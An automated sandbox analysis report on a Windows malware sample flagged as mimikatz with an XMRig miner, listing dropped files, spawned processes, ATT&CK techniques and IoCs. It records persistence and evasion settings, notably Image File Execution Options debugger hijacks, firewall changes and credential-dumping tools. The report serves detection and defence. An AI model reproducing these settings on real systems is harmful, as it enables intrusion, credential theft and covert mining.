mimikatz | bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc

Analysis

max time kernel
140s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
12/06/2024, 03:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
Size

7.9MB
MD5

37ec85eb0381650bdc07517103b48b2a
SHA1

ecf0fd56f861b867d762251a0be8d56640ad4fae
SHA256

bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc
SHA512

45052572632e6447ac052c3d131279e86dde334a0eae9ffac3f2fb9d14116061cdf55035e79381a1f07b46979eeffef54c69f47cb4fd6eea5d26be20407f94e7
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1588 created 2108	1588	detvrlv.exe	39

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (45471) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/memory/3136-137-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 40 IoCs

resource	yara_rule
behavioral2/memory/2196-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/2196-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0008000000023522-6.dat	UPX
behavioral2/memory/4592-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x000700000002356e-135.dat	UPX
behavioral2/memory/3136-136-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	UPX
behavioral2/memory/3136-137-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	UPX
behavioral2/files/0x0007000000023579-140.dat	UPX
behavioral2/memory/1468-141-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/1468-159-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/files/0x0007000000023577-163.dat	UPX
behavioral2/memory/2492-164-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/3068-170-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/3120-174-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6292-186-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-188-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/6608-191-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/1384-195-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-198-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/5688-201-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6272-205-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-208-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/4652-210-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/5368-218-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2616-222-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-224-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/2856-227-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-229-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/4244-231-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6744-233-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6680-235-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-236-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/1800-238-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6164-240-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/6436-242-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/7008-244-0x00007FF646100000-0x00007FF64615B000-memory.dmp	UPX
behavioral2/memory/2492-245-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/2492-246-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/2492-248-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX
behavioral2/memory/2492-249-0x00007FF733940000-0x00007FF733A60000-memory.dmp	UPX

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/2492-188-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-198-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-208-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-224-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-229-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-236-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-245-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-246-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-248-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig
behavioral2/memory/2492-249-0x00007FF733940000-0x00007FF733A60000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/2196-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/2196-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0008000000023522-6.dat	mimikatz
behavioral2/memory/4592-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3136-137-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	detvrlv.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	detvrlv.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4500	netsh.exe
4172	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	detvrlv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	detvrlv.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	detvrlv.exe

Executes dropped EXE 30 IoCs

pid	Process
4592	detvrlv.exe
1588	detvrlv.exe
4104	wpcap.exe
840	iuatpesve.exe
3136	vfshost.exe
1468	kirzyyvlv.exe
2540	xohudmc.exe
380	ogmqgi.exe
2492	eilgmk.exe
3068	kirzyyvlv.exe
3120	kirzyyvlv.exe
4140	ebkkcpcil.exe
6292	kirzyyvlv.exe
6608	kirzyyvlv.exe
1384	kirzyyvlv.exe
5688	kirzyyvlv.exe
6272	kirzyyvlv.exe
4652	kirzyyvlv.exe
2596	detvrlv.exe
5368	kirzyyvlv.exe
2616	kirzyyvlv.exe
2856	kirzyyvlv.exe
4244	kirzyyvlv.exe
6744	kirzyyvlv.exe
6680	kirzyyvlv.exe
1800	kirzyyvlv.exe
6164	kirzyyvlv.exe
6436	kirzyyvlv.exe
7008	kirzyyvlv.exe
5536	detvrlv.exe

Loads dropped DLL 12 IoCs

pid	Process
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
4104	wpcap.exe
840	iuatpesve.exe
840	iuatpesve.exe
840	iuatpesve.exe

UPX packed file 36 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002356e-135.dat	upx
behavioral2/memory/3136-136-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	upx
behavioral2/memory/3136-137-0x00007FF737F50000-0x00007FF73803E000-memory.dmp	upx
behavioral2/files/0x0007000000023579-140.dat	upx
behavioral2/memory/1468-141-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/1468-159-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/files/0x0007000000023577-163.dat	upx
behavioral2/memory/2492-164-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/3068-170-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/3120-174-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6292-186-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-188-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/6608-191-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/1384-195-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-198-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/5688-201-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6272-205-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-208-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/4652-210-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/5368-218-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2616-222-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-224-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/2856-227-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-229-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/4244-231-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6744-233-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6680-235-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-236-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/1800-238-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6164-240-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/6436-242-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/7008-244-0x00007FF646100000-0x00007FF64615B000-memory.dmp	upx
behavioral2/memory/2492-245-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/2492-246-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/2492-248-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx
behavioral2/memory/2492-249-0x00007FF733940000-0x00007FF733A60000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\ogmqgi.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	detvrlv.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\ogmqgi.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	detvrlv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	detvrlv.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 59 IoCs

description	ioc	Process
File created	C:\Windows\nmrmyinid\UnattendGC\specials\cnli-1.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\tibe-2.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\Shellcode.ini	detvrlv.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\ebkkcpcil.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\coli-0.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\zlib1.dll	detvrlv.exe
File created	C:\Windows\munqipvc\docmicfg.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\Corporate\mimidrv.sys	detvrlv.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\wpcap.dll	detvrlv.exe
File created	C:\Windows\munqipvc\schoedcl.xml	detvrlv.exe
File opened for modification	C:\Windows\nmrmyinid\Corporate\log.txt	cmd.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\crli-0.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\spoolsrv.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\vimpcsvc.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\AppCapture32.dll	detvrlv.exe
File created	C:\Windows\munqipvc\detvrlv.exe	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\docmicfg.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\schoedcl.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\svschost.xml	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\schoedcl.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\ip.txt	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\ucl.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\spoolsrv.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\trch-1.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\vimpcsvc.xml	detvrlv.exe
File created	C:\Windows\munqipvc\svschost.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\Corporate\vfshost.exe	detvrlv.exe
File created	C:\Windows\ime\detvrlv.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\libxml2.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\svschost.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\spoolsrv.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\xdvl-0.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\upbdrjv\swrpwe.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\ssleay32.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\trfo-2.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\schoedcl.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\svschost.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\Corporate\mimilib.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\libeay32.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\vimpcsvc.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\docmicfg.xml	detvrlv.exe
File created	C:\Windows\munqipvc\vimpcsvc.xml	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\spoolsrv.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\exma-1.dll	detvrlv.exe
File created	C:\Windows\munqipvc\spoolsrv.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\scan.bat	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\detvrlv.exe	bd822f8f0469c671fb165ac9f89aadad1f8e2287bc6f5ad02e4cbd8caffceccc.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\tucl-1.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\docmicfg.xml	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\AppCapture64.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\mirzmlbjb\Packet.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\posh-0.dll	detvrlv.exe
File created	C:\Windows\nmrmyinid\UnattendGC\specials\schoedcl.xml	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\svschost.xml	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\vimpcsvc.xml	detvrlv.exe
File opened for modification	C:\Windows\nmrmyinid\mirzmlbjb\Packet.dll	detvrlv.exe
File opened for modification	C:\Windows\munqipvc\docmicfg.xml	detvrlv.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2868	sc.exe
1132	sc.exe
2044	sc.exe
4932	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0008000000023522-6.dat	nsis_installer_2
behavioral2/files/0x001100000002352d-15.dat	nsis_installer_1
behavioral2/files/0x001100000002352d-15.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2240	schtasks.exe
4564	schtasks.exe
2644	schtasks.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	detvrlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	detvrlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	detvrlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	detvrlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	kirzyyvlv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	kirzyyvlv.exe
